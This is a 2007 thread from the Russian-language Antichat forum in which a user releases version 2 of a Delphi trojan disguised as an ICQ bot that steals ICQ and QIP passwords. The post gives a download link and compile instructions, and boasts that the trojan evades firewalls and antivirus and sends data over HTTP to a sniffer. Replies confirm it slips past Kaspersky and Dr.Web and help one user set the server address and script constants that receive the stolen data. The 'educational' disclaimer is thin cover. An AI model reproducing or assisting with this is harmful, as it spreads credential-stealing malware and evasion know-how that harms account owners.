ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
16.02.2007, 01:47
|
|
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850
Репутация:
536
|
|
Релиз ICQ трояна. ver 2
Итак, приступим. Если кто то постоянно тoрчит на Античате и у него хорошая память, то он помнит что гдето месяца полтора назад я выкладывал троянца, который маскируется под ICQ Бота, а на самом деле ворует пароли (очень нехороший =( ). Примерно в воскресенье я сел с утра и начал писать вторую версию. Закончил я это дело в понедельник =). Эти дни я давал троянца на проверку разным хорошим пиплам, чтобы они нашли и сообщили мне о глюках =), теперь же я выкладываю официальную (гыгы) вторую версию троянца. Нового оччень много, но обо всем попорядку. Что добавлено/исправлено:
- Добавлен поиск по винту НЕУСТАНОВЛЕННОГО QIP.
- Исправлены глючки с процедурой извлечения паролей (они были и во множетсве = ) ).
- Кардинально изменен способ передачи данных. Теперь троян использует не ICQ протокол, а HTTP, а еще конкретнее библиотеку WinInet. Не палится файерами (вроде бы =) ). Антивирями тоже не палится.
- Соответственно, если передача теперь по HTTP, То для троя был написан сниффер (его исходник в проекте).
- Написан подробный ReadMe.txt =))))
Обращаю внимание, что программа написана в ОБРАЗОВАТЕЛЬНЫХ целях, не стоит реально украдывать ею аськи!!!!
Архив с проектом качаем тутс:
http://ggg123321.narod.ru/troy.rar
Теперб к вопросам компиляции, после релиза первого трояна ICQ и еще одного моего троянца, мою личку зафлудили вопросами о компиляции =))). Объясняю все и всем сразу =). Ничего сложного нет!!! С проектом идет компонент TICQ2003Decrypt (автор не я, автор CobanS), его нужно установить. Далее нужно нажать ctrl-f9, чтобы Делфи скомпилировал троянца без запуска! Дальше можно оптимизировать размер каким нето пакером, но и то это будет приятное, но не обязательное дополнение. ВСЕ!!!!! Это не сложно!!!!! Если же совсем туго, то можно спросить в теме. Это не стыдно, форум для того и создан чтобы делится опытом и знаниями! Потом, у меня перебои с инетом, и я могу ответить не сразу, а в теме же это сделают пусть и дургие люди но оперативно!
Авторские права принадлежат прежде всего Antichat.Ru, ну и вашему покорному слуге - А®ТеS'y.
Вы можете модифироваь код, это только приветствуется, единственное чего вы не имеет права делать, это КОММЕРЧСКИ распространять программу.
__________________
CopyRight Antichat.Ru
2007 year
|
|
|
16.02.2007, 02:08
|
|
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508
Репутация:
1745
|
|
аффтор пость все в одном посте!
|
|
|
|
16.02.2007, 17:21
|
|
Постоянный
Регистрация: 12.02.2007
Сообщений: 316
Провел на форуме:
1573335
Репутация:
159
|
|
Кто нить качал?
|
|
|
|
16.02.2007, 18:14
|
|
Познающий
Регистрация: 19.11.2006
Сообщений: 64
Провел на форуме:
284408
Репутация:
48
|
|
я качал вируса не обнаружено, ещё бы суметь под себя подстроить=)
P.s. СКАЖЕМ ВСЕ СПАСИБО А®Теs!!
пока на работоспособность не пробовал , но всётаки
|
|
|
|
17.02.2007, 02:04
|
|
Познающий
Регистрация: 08.10.2006
Сообщений: 35
Провел на форуме:
454278
Репутация:
5
|
|
Автору респект!!!
Выдирает даже с флешек!  .
Работает вроде без багов, только дельфи 7 при компиляции какой-то совет дает, а так вроде без подстав канектится на указаный сниффер.
Outpost 4 резет.
Каспер с доктором вебом с последними базами на момент теста неполили.
Сообщение от Arxandel
я качал вируса не обнаружено, ещё бы суметь под себя подстроить=)
P.s. СКАЖЕМ ВСЕ СПАСИБО А®Теs!!
пока на работоспособность не пробовал , но все-таки
А что там настраивать там по-моему любой догонит.
Там на русским в исходниках написано где и что менять =)))
Если не поймёшь стуки в Асю помогу чем смогу 
P.s. даже я с первого раза все правильно скампилил |
|
|
|
17.02.2007, 02:10
|
|
Познающий
Регистрация: 25.01.2007
Сообщений: 67
Провел на форуме:
202498
Репутация:
25
|
|
Автору респект и плюсик в репу =)
|
|
|
|
17.02.2007, 16:53
|
|
Новичок
Регистрация: 15.02.2007
Сообщений: 4
Провел на форуме:
42292
Репутация:
0
|
|
Привет.
Скачал троя, подключил ICQ2003Decrypt , поменял константы, скомпилил.
Проверил - не пашет.
возможно пролема в константах.
Я их задал в формате:
Server_Addr: PChar= 'http://Myserver.122mb.com'; // мой сайт
ScriptName: PChar= 'need.php'; // имя скрипта.
hdrs: Pchar= 'Content-Type: application/x-www-form-urlencoded'; // Не менял
Скрипт лежит в корневой папке, т.е. http://Myserver.122mb.com/need.php
Лог файл тоже там.
С уважением, bt2mf88a
|
|
|
|
18.02.2007, 00:43
|
|
Познающий
Регистрация: 08.10.2006
Сообщений: 35
Провел на форуме:
454278
Репутация:
5
|
|
Сообщение от bt2mf88a
Server_Addr: PChar= 'http://Myserver.122mb.com'; // мой сайт
ScriptName: PChar= 'need.php'; // имя скрипта.
hdrs: Pchar= 'Content-Type: application/x-www-form-urlencoded'; // Не менял
Задавай в таком виде
Код:
Server_Addr: PChar= 'Myserver.122mb.com';
|
|
|
|
18.02.2007, 02:28
|
|
Новичок
Регистрация: 15.02.2007
Сообщений: 4
Провел на форуме:
42292
Репутация:
0
|
|
Так тоже задавал...
|
|
|
|
18.02.2007, 02:42
|
|
Познающий
Регистрация: 08.10.2006
Сообщений: 35
Провел на форуме:
454278
Репутация:
5
|
|
У меня примерно так и всё работает.
Код:
Server_Addr: PChar= 'Myserver.122mb.com';
ScriptName: PChar= 'need.php';
hdrs: Pchar= 'Content-Type: application/x-www-form-urlencoded';
Посматри может фаер блочит или антивирь?
Или ты просто неправильно установил компонент TICQ2003Decrypt.
поставь без заглавной буквы .
Код:
Server_Addr: PChar= 'myserver.122mb.com';
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
